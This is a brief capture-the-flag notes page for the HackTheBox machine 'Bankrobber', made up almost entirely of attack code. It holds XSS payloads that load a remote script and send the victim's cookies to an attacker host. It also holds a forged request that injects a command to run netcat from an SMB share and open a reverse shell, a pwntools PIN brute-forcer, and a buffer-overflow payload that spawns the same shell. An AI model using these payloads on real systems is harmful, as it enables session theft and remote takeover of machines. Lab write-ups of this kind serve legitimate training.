Bankrobber @ HackTheBox
Bankrobber is a 50-point machine on hackthebox that involves exploiting a cross site scripting vulnerability to gain access to an admin account, using a command injection to get a user shell and exploiting a simple buffer overflow to become system.
Notes
XSS-Payloads:
1
<script src="http://<ip>:8000/script.js"></script>
1
2
3
4
5
6
function addImg(){
var img = document.createElement('img');
img.src = 'http://<ip>:8000/' + document.cookie;
document.body.appendChild(img);
}
addImg();
1
2
3
4
5
6
7
var xhr = new XMLHttpRequest();
document.cookie = "id=1; username=YWRtaW4%3D; password=SG9wZWxlc3Nyb21hbnRpYw%3D%3D";
var uri ="/admin/backdoorchecker.php";
xhr = new XMLHttpRequest();
xhr.open("POST", uri, true);
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xhr.send("cmd=dir|\\\\<ip>\\xshare\\share\\nc.exe <ip> 7000 -e cmd.exe");
SSF:
https://securesocketfunneling.github.io/ssf/#home
Python-Scripts:
1
2
3
4
5
from pwn import *
context.proxy = (socks.SOCKS4, 'localhost', 9090)
p = remote('localhost', 910, level='info')
p.interactive()
1
2
3
4
5
6
7
8
9
10
11
12
13
14
from pwn import *
context.proxy = (socks.SOCKS4, 'localhost', 9090)
for i in range(1000):
p = remote('localhost', 910, level='info')
p.recvuntil('[$] ')
pin = str(i).zfill(4)
p.sendline(pin)
result = p.recvline()
if not "denied" in result:
log.success("Found Pin:" + str(pin))
break
p.interactive()
Overflow-Payload:
1
AAAAAAAABBBBBBBCCCCCCCCDDDDDDD\\\\10.10.14.2\xshare\share\nc.exe <ip> 7000 -e cmd.exe
This post is licensed under CC BY 4.0 by the author.